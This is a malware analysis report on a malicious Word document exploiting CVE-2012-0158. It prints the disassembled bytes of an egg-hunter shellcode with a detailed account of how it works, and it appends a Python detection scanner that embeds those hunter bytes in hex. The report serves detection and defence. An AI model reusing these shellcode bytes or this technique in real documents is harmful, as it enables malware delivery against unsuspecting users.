Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 01cbbff86fb7b4bf…

MALICIOUS

Office (OLE)

Size: 48.5 KB
Created: 2011-04-06 07:47:00
Authoring application: Microsoft Office Word
First seen: 2015-10-06
MD5: b493941450b2e46a9c55c11c97d60be0
SHA-1: 6702cb47ed58ad12530e62f27a10f80455f7e7a8
SHA-256: 01cbbff86fb7b4bf593927d7c943e7c3c61719c7d0adfb318a7721c8812cec9a
Risk score: 82

Heuristics (3)

  • MSCOMCTL.ListView — CVE-2012-0158 high CVE likely CVE_2012_0158
    The document carries the MSCOMCTL.OCX ListView ActiveX control, the component targeted by CVE-2012-0158 (MS12-027), a stack buffer overflow in the parsing of the control's persisted data that was exploited through crafted Office and RTF documents. The "likely" qualifier means the control itself was matched, not that the malformed record was confirmed; in this sample the overflow is the plausible route by which the egg hunter below first runs. Inspecting the control's data stream in the document's ObjectPool storage for the oversized record confirms the trigger.
  • Egg-hunter shellcode pattern high SC_EGG_HUNTER
    A 35-byte skape-style egg hunter at 000068AC: it walks memory one page at a time, probing each address with NtAccessCheckAndAuditAlarm (syscall index 2, entered through int 0x2e) and moving on when the call returns STATUS_ACCESS_VIOLATION (cmp al, 5 tests the low byte of 0xC0000005), until it finds the 4-byte tag 0x90419041 (bytes 41 90 41 90, which also decode as inc ecx / nop) twice in a row, then jumps past it (jmp edi) into the second stage. Two details matter for the analyst. First, the egg is the tag doubled, so the real payload is wherever 41 90 41 90 41 90 41 90 appears in the document, not in this listing. Second, the miss loop at 000068B2 adds 0x7c to edx instead of the reference hunter's single inc, so it samples memory at 124-byte strides; a lone eight-byte egg would usually be skipped, and the payload is expected to be preceded by a long run of the tag. The bytes after jmp edi (a nop sled, then 42 00 pairs, i.e. UTF-16LE "B" padding) are data the disassembler decoded as instructions, not code.
    Disassembly
    x86 disassembly · validity: code (1.0) — 3/3 branch targets land on an instruction boundary (100% coherence)
    000068AC  6681caff0f        or dx, 0xfff
    000068B1  42                inc edx
    000068B2  83c27c            add edx, 0x7c
    000068B5  52                push edx
    000068B6  6a02              push 2
    000068B8  58                pop eax
    000068B9  cd2e              int 0x2e
    000068BB  3c05              cmp al, 5
    000068BD  5a                pop edx
    000068BE  74ec              je 0x68ac
    000068C0  b841904190        mov eax, 0x90419041
    000068C5  89d7              mov edi, edx
    000068C7  af                scasd eax, dword ptr es:[edi]
    000068C8  75e8              jne 0x68b2
    000068CA  af                scasd eax, dword ptr es:[edi]
    000068CB  75e5              jne 0x68b2
    000068CD  ffe7              jmp edi
    000068CF  90                nop
    000068D0  90                nop
    000068D1  90                nop
    000068D2  90                nop
    000068D3  90                nop
    000068D4  90                nop
    000068D5  90                nop
    000068D6  90                nop
    000068D7  90                nop
    000068D8  90                nop
    000068D9  90                nop
    000068DA  42                inc edx
    000068DB  004200            add byte ptr [edx], al
    000068DE  42                inc edx
    000068DF  004200            add byte ptr [edx], al
    000068E2  42                inc edx
    000068E3  004200            add byte ptr [edx], al
    000068E6  42                inc edx
    000068E7  004200            add byte ptr [edx], al
    000068EA  42                inc edx
    000068EB  004200            add byte ptr [edx], al
    000068EE  42                inc edx
    000068EF  004200            add byte ptr [edx], al
    000068F2  42                inc edx
    000068F3  004200            add byte ptr [edx], al
    000068F6  42                inc edx
    000068F7  004200            add byte ptr [edx], al
    000068FA  42                inc edx
    000068FB  004200            add byte ptr [edx], al
    000068FE  42                inc edx
    000068FF  004200            add byte ptr [edx], al
    00006902  42                inc edx
    00006903  004200            add byte ptr [edx], al
    00006906  42                inc edx
    00006907  004200            add byte ptr [edx], al
    0000690A  42                inc edx
    0000690B  00                .byte 0x00
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.euskonews.com/0573zbk/gaia57301es.html (channel: document text, OLE body)
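The egg-hunter heuristic above can be reproduced outside the analysis tool. The Python scanner below is an added example, not part of this report or of the tool that produced it: it carries the hunter's byte signature from the disassembly at 000068AC (the tag, the rel8 branch displacements and the `add edx, imm8` stride are wildcards, so skape's 32-byte reference hunter matches as well), extracts the tag from the `mov eax` immediate, and then searches the same buffer for the doubled tag to locate the stage the hunter would jump to. The sample buffer, its filler and the three-byte stand-in second stage are constructed for the demonstration; the only bytes taken from the report are the hunter itself.

```python
"""Static check for a skape-style egg hunter and the egg it hunts for.

Added example for this report, not output of the analysis tool. The signature
follows the disassembly at 000068AC; SAMPLE is a constructed buffer.
"""
import re
import struct

# Hunter signature. Wildcards: the 4-byte tag (captured), the rel8 branch
# displacements, an optional `add edx, imm8` stride (present in this sample,
# absent in skape's reference hunter) and both encodings of `mov edi, edx`.
EGG_HUNTER_RE = re.compile(
    rb"\x66\x81\xca\xff\x0f"   # or dx, 0xfff     : edx -> last byte of this page
    rb"\x42"                   # inc edx          : first byte of the next page
    rb"(?:\x83\xc2.)?"         # add edx, imm8    : stride per miss (variant)
    rb"\x52"                   # push edx
    rb"\x6a\x02\x58"           # push 2 / pop eax : NtAccessCheckAndAuditAlarm
    rb"\xcd\x2e"               # int 0x2e         : legacy 32-bit syscall gate
    rb"\x3c\x05"               # cmp al, 5        : STATUS_ACCESS_VIOLATION low byte
    rb"\x5a"                   # pop edx
    rb"\x74."                  # je loop_inc_page : unmapped, try the next page
    rb"\xb8(....)"             # mov eax, <tag>   : the egg tag, captured
    rb"(?:\x89\xd7|\x8b\xfa)"  # mov edi, edx
    rb"\xaf\x75."              # scasd / jne loop_inc_one
    rb"\xaf\x75."              # scasd / jne loop_inc_one : tag must appear twice
    rb"\xff\xe7",              # jmp edi          : run whatever follows the egg
    re.DOTALL,
)

# The 35 bytes listed at 000068AC..000068CE in the report.
HUNTER = bytes.fromhex(
    "6681caff0f 42 83c27c 52 6a02 58 cd2e 3c05 5a 74ec"
    " b841904190 89d7 af 75e8 af 75e5 ffe7"
)

# skape's 32-byte reference hunter (tag 0x50905090), for comparison.
SKAPE_HUNTER = bytes.fromhex(
    "6681caff0f 42 52 6a02 58 cd2e 3c05 5a 74ef b890509050 8bfa af 75ea af 75e7 ffe7"
)

TAG = b"\x41\x90\x41\x90"   # imm32 0x90419041 stored little-endian; decodes as inc ecx / nop
STAGE2 = b"\x31\xc0\xc3"    # constructed stand-in for the second stage (xor eax, eax; ret)

# Constructed document-like buffer: hunter, nop sled, UTF-16LE "B" padding like the
# report's trailing 42 00 bytes, then the egg (tag x3) and the second stage.
SAMPLE = (
    b"\x00" * 16
    + HUNTER
    + b"\x90" * 11
    + b"B\x00" * 20
    + b"\x00" * 8
    + TAG * 3
    + STAGE2
)


def find_egg_hunters(data: bytes) -> list:
    """Return one record per hunter found in data, with the egg(s) it would reach."""
    hits = []
    for m in EGG_HUNTER_RE.finditer(data):
        code, tag = m.group(0), m.group(1)
        # Byte 6 is 0x83 only when the optional `add edx, imm8` is present.
        stride = code[8] if code[6] == 0x83 else 1
        egg = tag * 2                      # two consecutive scasd hits are required
        eggs = []
        pos = data.find(egg)
        while pos != -1:
            jump = pos + len(egg)          # edi after the second scasd
            payload = jump
            while data[payload:payload + 4] == tag:   # extra tag copies act as a slide
                payload += 4
            eggs.append({"egg": pos, "jump": jump, "payload": payload})
            pos = data.find(egg, payload)  # resume after the whole tag run
        hits.append({
            "offset": m.start(),
            "length": len(code),
            "tag": tag,
            "imm32": struct.unpack("<I", tag)[0],
            "stride": stride,
            "eggs": eggs,
        })
    return hits


if __name__ == "__main__":
    for h in find_egg_hunters(SAMPLE):
        print(f"hunter @ {h['offset']:#06x} ({h['length']} bytes) "
              f"tag={h['imm32']:#010x} stride={h['stride']}")
        for e in h["eggs"]:
            print(f"  egg @ {e['egg']:#06x} -> jump {e['jump']:#06x}, payload {e['payload']:#06x}")
```

Run against the document itself, the scanner reports the hunter at the listing's 000068AC if that value is a file offset, a stride of 0x7c, and the offset of the doubled 41 90 41 90 tag, which points at the second stage the disassembly above does not show. Because 41 90 decodes as inc ecx / nop, landing inside a longer run of the tag is harmless, which is why the payload field skips past any extra copies before reporting where the stage-two code starts.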